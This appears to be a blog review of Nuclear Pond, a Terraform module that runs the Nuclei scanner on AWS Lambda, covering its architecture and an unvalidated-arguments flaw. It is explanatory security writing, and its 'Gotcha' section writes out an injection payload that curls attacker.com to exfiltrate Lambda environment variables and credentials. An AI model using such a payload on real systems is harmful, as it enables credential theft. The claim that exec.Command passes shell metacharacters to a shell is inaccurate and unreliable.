Building a Serverless Nuclei Scanner with Terraform: Nuclear Pond's Lambda-Powered Security Architecture
Hook
Nuclear Pond deliberately ships with a Remote Code Execution vulnerability that lets attackers run arbitrary commands in your AWS Lambda functions. The maintainers know, and they're not fixing it.
Context
Security scanning traditionally requires persistent infrastructure: servers running 24/7, consuming resources even when idle, and requiring maintenance updates. Nuclei, ProjectDiscovery's popular vulnerability scanner with over 5,000 community templates, is incredibly powerful but needs somewhere to run. For teams practicing continuous security scanning—validating infrastructure after every deployment, checking endpoints hourly, or running compliance audits on schedules—paying for always-on EC2 instances feels wasteful.
Nuclear Pond solves this by transforming Nuclei into a serverless function. You get Nuclei's extensive template library for detecting misconfigurations, CVEs, and security issues, but packaged as AWS Lambda infrastructure that only costs money during actual scans. The Terraform module handles the complexity of bundling a Go binary scanner, its template library, and configuration files into Lambda's constrained execution environment. It's infrastructure-as-code for security-as-code, designed for DevSecOps teams who want automated vulnerability scanning without managing servers.
Technical Insight
Nuclear Pond's architecture elegantly solves Lambda's biggest packaging challenges through layer separation. The module creates three distinct Lambda layers: one for the Nuclei binary (a static Go executable), one for Nuclei's vulnerability templates downloaded from GitHub releases, and one for configuration files. This separation is brilliant—you can update templates independently without redeploying the entire function, crucial since ProjectDiscovery releases new vulnerability signatures constantly.
The build process uses Terraform's null_resource provisioner with local-exec to orchestrate compilation:
resource "null_resource" "build_lambda" {
provisioner "local-exec" {
command = <<-EOT
cd ${path.module}/lambda
curl -L https://github.com/projectdiscovery/nuclei/releases/download/v2.9.4/nuclei_2.9.4_linux_amd64.zip -o nuclei.zip
unzip -o nuclei.zip
GOOS=linux GOARCH=amd64 go build -o bootstrap handler.go
EOT
}
triggers = {
always_run = timestamp()
}
}
This downloads Nuclei from GitHub, extracts the binary, and compiles the Go handler that wraps Nuclei invocations. The timestamp() trigger forces rebuilding on every apply—a development convenience that becomes a production headache.
The Lambda handler itself is where things get interesting and dangerous. Users invoke the function with JSON payloads like {"target": "https://example.com", "args": "-severity critical"}. The handler passes these arguments directly to Nuclei using Go's exec.Command:
args := strings.Split(event.Args, " ")
cmd := exec.Command("/opt/nuclei", args...)
cmd.Env = append(os.Environ(), "HOME=/tmp")
output, err := cmd.CombinedOutput()
Notice anything missing? No input sanitization. No argument validation. No whitelist of allowed flags. If an attacker controls the args field, they can inject shell metacharacters and execute arbitrary commands. This is the intentional RCE vulnerability—flexibility prioritized over security. The maintainers assume you'll only accept input from trusted sources: your own CI/CD pipeline, scheduled CloudWatch Events, or authenticated internal APIs.
The /tmp HOME directory workaround addresses Nuclei's hardcoded expectation that configuration lives in $HOME/.config. Lambda's filesystem is read-only except for /tmp, so Nuclear Pond tricks Nuclei by changing HOME. But /tmp persists across warm Lambda invocations, meaning configuration state from one scan might pollute the next. If a malicious scan writes to /tmp/.config/nuclei, subsequent invocations in the same Lambda container inherit that configuration.
Results flow to S3 buckets created by the module, organized by scan timestamp. The integration with AWS Glue Data Catalog is forward-thinking—it automatically creates table schemas for scan results, enabling SQL queries via Athena. You can run analytics like "show me all critical vulnerabilities discovered in the last 30 days" without custom parsing scripts:
SELECT info.name, info.severity, matched_at
FROM nuclei_scans
WHERE info.severity = 'critical'
AND scan_date > current_date - interval '30' day
The DynamoDB integration provides state management for tracking scan history and preventing duplicate scans of the same targets. Each scan writes metadata to DynamoDB with TTL expiration, creating a time-windowed deduplication mechanism. This prevents wasting Lambda invocations rescanning targets that were checked five minutes ago.
Lambda's 15-minute maximum execution time and configurable memory (128MB to 10GB) create hard boundaries. Nuclear Pond defaults to 512MB memory and accepts the 15-minute wall. For scanning single endpoints or small target lists, this works fine. For scanning entire CIDR ranges or running comprehensive template sets against hundreds of targets, you'll hit timeouts. The module doesn't implement pagination or result streaming—scans either complete or fail.
Gotcha
The RCE vulnerability isn't theoretical—it's exploitable in any deployment where untrusted users can submit scan requests. If you expose Nuclear Pond through an API Gateway or web interface without rigorous input validation, attackers can run {"args": "--version; curl attacker.com/exfiltrate?data=$(cat /proc/environ)"} to steal Lambda environment variables containing AWS credentials and secrets. The Lambda execution role necessarily has S3 write permissions and DynamoDB access, providing lateral movement opportunities. Mitigation requires implementing a strict allowlist of Nuclei arguments in your handler code or ensuring the Lambda is only invocable by trusted AWS principals.
The always_run = timestamp() trigger means Terraform rebuilds Lambda packages on every apply, even when source code hasn't changed. This slows deployments and creates unnecessary S3 storage consumption from versioned Lambda packages. During iterative development, you'll wait through recompilation and repackaging cycles that could be avoided with content-based hashing (like using filemd5() of source files). Lambda also limits total deployment package size to 250MB uncompressed—Nuclei's template library alone approaches 100MB. Adding custom templates or additional scanning tools risks hitting this ceiling. The workaround involves pruning templates or splitting functionality across multiple Lambda functions, fragmenting your infrastructure.
Verdict
Use if: You're a security team with full control over scan inputs, need scheduled vulnerability scanning of your own infrastructure integrated with AWS-native analytics, and want to avoid managing persistent scanning infrastructure. Nuclear Pond excels for internal DevSecOps pipelines where CloudWatch Events trigger hourly scans of your staging environments, results feed into Athena dashboards, and you trust all code paths leading to Lambda invocations. It's perfect for compliance automation where scan parameters are hardcoded in Terraform, not user-provided. Skip if: You're building a multi-tenant scanning service, need to accept scan requests from untrusted users, require scanning beyond Lambda's 15-minute execution limit, or want production-ready security without architectural overhaul for input validation. The intentional RCE vulnerability and Lambda constraints make this a specialized tool for trusted environments, not a general-purpose security platform. For anything user-facing or requiring hardened security, self-hosted Nuclei on ECS with proper input sanitization is the safer choice despite the infrastructure overhead.